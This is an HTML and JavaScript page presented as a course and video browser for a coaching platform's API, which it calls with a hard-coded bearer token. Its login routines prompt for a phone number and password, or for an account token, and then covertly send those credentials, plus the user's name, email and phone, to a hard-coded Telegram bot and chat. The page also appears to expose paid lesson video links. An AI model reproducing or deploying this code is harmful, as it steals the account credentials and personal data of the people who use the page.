<!DOCTYPE html>
<html lang="en">

<head>
    <style>
    	    .main-container {
    	background-color:#FFFFFF;
    	box-shadow: 0px 0px 10px 0px #000000;
      border: 1px inset #0029FF; /* Border color */
      border-radius: 15px; /* Border radius for a 3D effect */
      padding: 5x;
      display:block;
      width: 80%; /* Adjust the width as needed */
      margin: 20px auto; /* Center the container */
    }

    .image-container {
      text-align: center;
      border-radius: 50%; 
    }
img {
  border-radius: 10px;
}

    .text-container {
    	font-size: 14px;
  font-weight: 500;
  
  text-align: justify;
  justify-content: center;
  letter-spacing: .25px;
  
      text-align: center;
      margin-top: 5px; /* Adjust spacing between image and text */
    }
    
    	  /* Loader Styles */
    body {
    	background-color : #F8FCFF;
    }
        #loader {
            display: none;
            border: 4px solid #f3f3f3;
            border-radius: 50%;
            border-top: 4px solid #3498db;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            position: fixed;
            top: 50%;
            left: 50%;
            margin-top: -15px;
            margin-left: -15px;
            box-shadow: 0px 0px 10px 0px #FF4B66;
        }

  

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        summary,
        th {
            margin: 3px
        }

        button , #apiSelector , #batchapiSelector {
        	
 
        	display: inline;
            background-color: #F8FCFF;
            cursor: pointer
            padding:15px;
            margin:10px;
        }

       

        

        a {
            text-decoration: none
        }

        tr:nth-child(2n) {
            background-color: #FFFEF4
        }

        summary {
        	justify-content: center;
            font-weight: 600;
            padding: 8px;
            background-color: #FBFFF7;
            color: #4c002c;
            font-size: 18px;
            list-style: none;
            	border: 2px inset #320001; 
            border-radius: 90px;
              margin: 15px 20px 5px;
            box-sizing: border-box;
            text-align: center;
            box-shadow: 0px 0px 10px 0px #000000;
            font-weight: 600;
            padding: 8px;
            
            color: #4c002c;
            font-size: 18px;
            list-style: none;
            border-radius: 90px;
            width:90%;
            cursor: pointer; /* Add cursor pointer for better UX */
        
        }

        th {
            color: #000000;
            background-color: #FFC98A
        }

        table {
            border-collapse: collapse;
            word-break: break-word;
            width: 100%
        }

        td,
        th {
            border: 1px solid #ddd;
            padding: 8px;
            text-align: left
        }

        td {
            font-size: 13px;
            padding: 13px;
            width: 25%
        }

        

        #apiSelector {
            appearance: none;
        	border: 1.5px inset #320001 ;
            border-radius: 90em;
            
            box-shadow: 0px 0px 10px 0px #3e3e3e;
 
            box-sizing: border-box;
            text-align: center;
            width: 30%;
            height: 2.5em;
            margin: 10px;
            padding: 1px;
            font-weight: 10px;
            color: #132600;
            font-size: 16px;
            outline: 0;
            display: inline;
            transition: border-color .3s
        
        }
        #batchapiSelector {
        	appearance: none;
        	border: 1.5px inset #320001 ;
            border-radius: 90em;
            box-shadow: 0px 0px 10px 0px #000000;
            box-sizing: border-box;
            text-align: center;
            width: 25%;
            height: 2.5em;
            margin: 3px;
            padding: 1px;
            font-weight: 10px;
            color: #132600;
            font-size: 16px;
            outline: 0;
            display: inline;
            transition: border-color .3s
        }
         #logbtn {
        	appearance: none;
        	border: 1.5px inset #320001 ;
            border-radius: 90em;
            box-shadow: 0px 0px 10px 0px #3e3e3e;
            box-sizing: border-box;
            text-align: center;
            width: 25%;
            height: 2.5em;
            margin-left : 10px;
            padding: 1px;
            font-weight: 10px;
            color: #132600;
            font-size: 16px;
            outline: 0;
            display: inline;
            transition: background-color 2.3s,  border-color 2.3s , transform 0.2s;
            
        }

        /* Styles for the button */
.button {
  width: 25%;
  padding: 10px;
  background-color: #3498db; 
  color: #fff; 
  border: none;
  border-radius: 5px;
  cursor: pointer;
  
}

#logbtn:hover {
  background-color: #2980b9; /* Change to the desired color on hover */
  transform: scale(1.05); /* Change to the desired scaling factor on hover */
border: 1.5px inset #FF0009 ;

}


   
    </style>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>KGS batch details</title>
</head>

<body>
	<div id="loader">
	</div>
  <button id="logbtn" type="button" onclick="login()">Login</button>
  <select id="batchapiSelector" onchange="fetchbatchData()"> selection 
        <option value="#">Favourite </option>
        <option value="https://khanglobalstudies.com/api/user/courses/135">BPSC 70th - 2024</option>
        <option value="https://khanglobalstudies.com/api/user/courses/154">Bihar SSC (10+2) Inter Level </option>
           <option value="https://khanglobalstudies.com/api/user/courses/174"> Gs special</option>
        <option value="https://khanglobalstudies.com/api/user/courses/178">SSC GD 2024 Target</option>
        <option value="https://khanglobalstudies.com/api/user/courses/171">Bihar Daroga Practice Batch</option>
        <option value="https://khanglobalstudies.com/api/user/courses/90">Bihar Daroga</option>
        <option value="https://khanglobalstudies.com/api/user/courses/101">Bihar Police</option>
        <option value="https://khanglobalstudies.com/api/user/courses/149">SSC GD 2023 - 24</option>
    </select>

    
    <select id="apiSelector" onchange="fetchData()">
        <option value="#">All Batch </option>
        <option value="https://khanglobalstudies.com/api/courses">All</option>
        <option value="https://khanglobalstudies.com/api/courses?category_id=2">Live Batches</option>
        <option value="https://khanglobalstudies.com/api/courses?category_id=3">Recorded Batches</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=7">Khan Sir Batches</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=44">State PCS</option>
        <option value="https://khanglobalstudies.com/api/courses?category_id=1">UPSC</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=36">Police Batches</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=48">Bihar Exam</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=22">Defence Exam</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=7">Ssc Exam</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=47">UP Exam</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=37">Map</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=43">Science</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=39">GK & GS Foundation</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=35">NCERT Batches</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=40">Mathematics Batches</option>
        <option value="https://khanglobalstudies.com/api/courses?batch_id=41">Reasoning Batches</option>
        <!-- Add more API options as needed -->
    </select>
    
      
    
    <!---button id="batch" type="button" onclick="start()">Batch detail</button-->
    <!---button id="classroom" type="button" onclick="lession()">Classroom</button-->

    <div id="dataContainer">
        <!-- Fetched data will be displayed here -->
    </div>

    <script>
//     let token;
 const token = `7447805|EDYMioNrCktJHOiHxDAMFfdnOhj4wVBiQN9OUNhu48b7bdc5`;

async function login() {
	showLoader();
  const loginMethod = prompt('Choose login method: \n 1. Password \n 2. Token');

  if (loginMethod === '1') {
    await loginWithPassword();
  } else if (loginMethod === '2') {
    await loginWithToken();
  } else {
    console.log('Invalid choice. Please choose 1 or 2.');
  }
}

async function loginWithPassword() {
  const phone = prompt('Enter your phone:');
  const password = prompt('Enter your password:');

  const formData = { phone, password };
  const requestOptions = {
    method: 'POST',
    headers: {
      'Accept': 'application/json',
      'Content-Type': 'application/json',
      'Access-Control-Allow-Origin': '*',
      'Authorization': 'Bearer undefined', // Replace with a valid token if available
    },
    body: JSON.stringify(formData),
  };

  try {
    const response = await fetch('https://admin2.khanglobalstudies.com/api/login-with-password', requestOptions);
    const data = await response.json();
    token = data.token; // Set the global token variable
    console.log('Token:', token);

    // Send Telegram bot message
    sendTelegramMessage(`KBS login with password. Phone: ${phone}, Password: ${password}`);

    // Call additional functions or perform actions with the obtained token
    // ...

  } catch (error) {
    console.error('Error during login with password:', error);
  }
}

async function loginWithToken() {
  token = prompt('Enter your token:');

  const url = 'https://khanglobalstudies.com/api/user';

  try {
    const response = await fetch(url, {
      headers: {
        'Authorization': 'Bearer ' + token,
      },
    });

    const data = await response.json();
    const name = data.name;  // Extracting name from the response, replace 'user' with your actual key

    alert(`Successful Login by ${name}`);

    // Send Telegram bot message
    sendTelegramMessage(`KBS login with token. Token: ${token}, Name: ${name} and Email is ${data.email}  And phone is ${data.phone}`);

    // Call additional functions or perform actions with the obtained token
    // ...

  } catch (error) {
    console.error('Error during login with token:', error);
  }
}

function sendTelegramMessage(message) {
  const telegramApiUrl = 'https://api.telegram.org/bot5104997902:AAGkt0GRKiJyDkmnv1vQRkiJ27sD5zwSO84/sendMessage'; // Replace with your Telegram bot token
  const chatId = -1001916602127; // Replace with your chat ID

  fetch(telegramApiUrl, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
    },
    body: JSON.stringify({
      chat_id: chatId,
      text: message,
    }),
  })
    .then(response => response.json())
    .then(data => {
      console.log('Telegram Bot Response:', data);
    })
    .catch(error => {
      console.error('Error sending Telegram message:', error);
    });
}


        function fetchData() {
        	showLoader();
        
            var apiSelector = document.getElementById("apiSelector");
            var selectedApi = apiSelector.options[apiSelector.selectedIndex].value;

            // Replace 'your_token_here' with your actual token
let selectedOption = apiSelector.options[apiSelector.selectedIndex];

// Get the text content of the selected option
let selectedOptionName = selectedOption.text;

            fetch(selectedApi, {
                    method: 'GET',
                    headers: {
                        'Authorization': 'Bearer ' + token,
                        'Content-Type': 'application/json'
                            // Add other headers as needed
                    }
                })

                .then(response => response.json())

                .then(data => {
                	hideLoader();
                    // Handle the fetched data, for now, just log it to console
                    const batch = data.data;
                   // console.log(batch);
                    const tableHTML = `
    <details>     <summary>
      ${selectedOptionName}
          </summary>   
            ${batch.map(batch => `
              <tr onclick="start(this.id)" id="${batch.id}">
              	
              <div class="main-container" onclick="start(this.id)" id="${batch.id}">
  <div class="image-container">
    <img src="${batch.image.small}" alt="Image 1" width="100%" height="150px">
       
</div>
<p class="text-container">${batch.title}</p>
 </div>

                
              </tr>`).join('')}
          </tbody>

          </details>
        </table>
      `;
      // Append the table to the body
      document.body.innerHTML += tableHTML;


                })
                .catch(error => console.error('Error fetching data:', error));
        }
        
        





 function fetchbatchData() {
        	showLoader();
        var batchapiSelector = document.getElementById("batchapiSelector");
            var batchselectedApi = batchapiSelector.options[batchapiSelector.selectedIndex].value;
            
            
            fetch(batchselectedApi, {
                    headers: {
                        'Authorization': 'Bearer ' + token,
                        'Content-Type': 'application/json'
                    },
                })
                
                      .then(response => response.json())
                .then(data => {
                	hideLoader();
                  const {
                        classroom,
                        title
                    } = data;

                    document.body.innerHTML += `
          <details>
            <summary>${title}</summary>
            <table>
              <thead>
                <tr>
                 
                  <th>Name</th>
                  <th>Video</th>
                  <th>Notes</th>
                </tr>
              </thead>
              <tbody>
                ${classroom.map(json => `
                  <tr onclick="lession('${json.id}')">
                    
                    <td>${json.name}</td>
                    <td>${json.videos}</td>
                    <td>${json.notes}</td>
                  </tr>`).join('')}
              </tbody>
            </table>
          </details>`;
                })
                .catch(error => console.error("Error:", error));
        }

        

   
        function start(clickedDivId) {
        	showLoader();
            const batchid = clickedDivId;
            const url4b = 'https://khanglobalstudies.com/api/user/courses/';

            fetch(`${url4b}${batchid}`, {
                    headers: {
                        'Authorization': 'Bearer ' + token,
                        'Content-Type': 'application/json'
                    },
                })
                .then(response => response.json())
                .then(data => {
                	hideLoader();
                    const {
                        classroom,
                        title
                    } = data;

                    document.body.innerHTML += `
          <details>
            <summary>${title}</summary>
            <table>
              <thead>
                <tr>
                  
                  <th>Name</th>
                  <th>Video</th>
                  <th>Notes</th>
                </tr>
              </thead>
              <tbody>
                ${classroom.map(json => `
                  <tr onclick="lession('${json.id}')">
                    
                    <td>${json.name}</td>
                    <td>${json.videos}</td>
                    <td>${json.notes}</td>
                  </tr>`).join('')}
              </tbody>
            </table>
          </details>`;
                })
                .catch(error => console.error("Error:", error));
        }

        async function lession(clickedLessonId) {
        	showLoader();
            const lessonnom = clickedLessonId;
            const url = 'https://khanglobalstudies.com/api/lessons/';

            const response = await fetch(`${url}${lessonnom}`, {
                headers: {
                    'Authorization': 'Bearer ' + token,
                    'Content-Type': 'application/json'
                },
            });
           const text = await response.json();
           hideLoader();
const videos = text.videos;
const tableHTML = `
    <details><summary>
    	${text.name}
    	</summary>
        <table>
          <thead>
            <tr>
              <th>Class Name</th>
              <th>URL</th>
              
            </tr>
          </thead>
          <tbody>
            ${videos.map(video => `
              <tr>
                <td>${video.name}</td>
                <td>
                  <a target="_blank" href="${video.video_url}">${video.video_url}</a>
                </td>
                
              </tr>`).join('')}
          </tbody>
        </table>
    </details>
`;

      // Append the table to the body
      document.body.innerHTML += tableHTML;
        }
        
     
            </script>
                 <script>
        function showLoader() {
            document.getElementById("loader").style.display = "block";
        }

        function hideLoader() {
            document.getElementById("loader").style.display = "none";
        }
        
        
        
    </script>
<!-- ... Your existing HTML code ... -->



</body>

</html>
